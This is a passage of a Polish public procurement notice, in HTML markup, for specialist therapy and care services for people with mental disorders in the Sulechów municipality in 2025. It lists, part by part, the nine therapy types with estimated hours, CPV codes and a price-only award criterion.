pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>3	Pedagog 84<br/><br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4 - terapia psychologiczna<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>4	Psycholog 12<br/><br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 5 - muzykoterapia<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>5	Muzykoterapia 288<br/><br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 6 - terapia zajęciowa<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>6	Terapia zajęciowa	384<br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85120000-6 - Usługi medyczne i podobne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 7 - trening umiejętności społecznych<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>7	Trening umiejętności społecznych	316,8<br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121200-5 - Specjalistyczne usługi medyczne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 8 - integracja sensoryczna<br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/><br/>8	Integracja sensoryczna	146,4<br/><br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej, ani nie będzie prowadził negocjacji.<br/>6.	Zamawiający nie wymaga składania oferty w postaci katalogów elektronicznych i dołączania katalogów elektronicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121200-5 - Specjalistyczne usługi medyczne</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt.<br/>4.	Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamówienie zostanie udzielone wykonawcy, który spełni wszystkie wymagania postawione w SWZ oraz którego oferta otrzyma największą liczbę punktów w kryterium oceny ofert.<br/>6.	W powyższym przypadku Zamawiający na podstawie art. 246 ust. 2. ustawy Prawo zamówień publicznych zastosował kryterium ceny jako jedyne kryterium oceny ofert, ponieważ w opisie przedmiotu zamówienia zostały określone wymagania jakościowe odnoszące się do przedmiotu zamówienia – parametry jakościowe poszczególnych elementów zamawianych usług.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 9 - terapia neurologopedyczna <br/>1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi - w zakresie rehabilitacji oraz usprawniania zaburzonych funkcji organizmu osób oraz dzieci i młodzieży z zaburzeniami psychicznymi w miejscu zamieszkania w roku 2025 na terenie gminy Sulechów na podstawie:<br/>1)	art. 18 ust. 1 pkt. 3, art. 50 ust. 1 i 2 oraz ust. 7 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz.U. z 2024 r., poz. 1283),<br/>2)	rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 r. poz. 816),<br/>3)	zarządzeniu Wojewody Lubuskiego z dnia 18 stycznia 2021 r. w sprawie ustalenia sposobu wykonania zadań z zakresu administracji rządowej realizowanych przez jednostki samorządu terytorialnego na rzecz osób z zaburzeniami psychicznymi w województwie lubuskim,<br/>Lp.	Rodzaj terapii	Szacowana liczba godzin w 2025<br/>9	Terapia neurologopedyczna	240<br/>2.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.	Zamawiający dopuszcza możliwość składania ofert częściowych w podziale na dziewięć części:<br/>a)	Zadanie 1 - rehabilitacja / fizykoterapia<br/>b)	Zadanie 2 - terapia logopedyczna<br/>c)	Zadanie 3 - terapia pedagogiczna<br/>d)	Zadanie 4 - terapia psychologiczna<br/>e)	Zadanie 5 - muzykoterapia<br/>f)	Zadanie 6 - terapia zajęciowa<br/>g)	Zadanie 7 - trening umiejętności społecznych<br/>h)	Zadanie 8 - integracja sensoryczna<br/>i)	Zadanie 9 - terapia neurologopedyczna <br/> Ofertę można złożyć na jedną, kilka lub na wszystkie części. Zamawiający nie ogranicza liczby części, na które Wykonawca może złożyć ofertę.<br/>4.	Zamawiający nie przewiduje możliwości udzielenia zamówień z wolnej ręki, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy. <br/>5.	Zamawiający nie będzie dokonywał 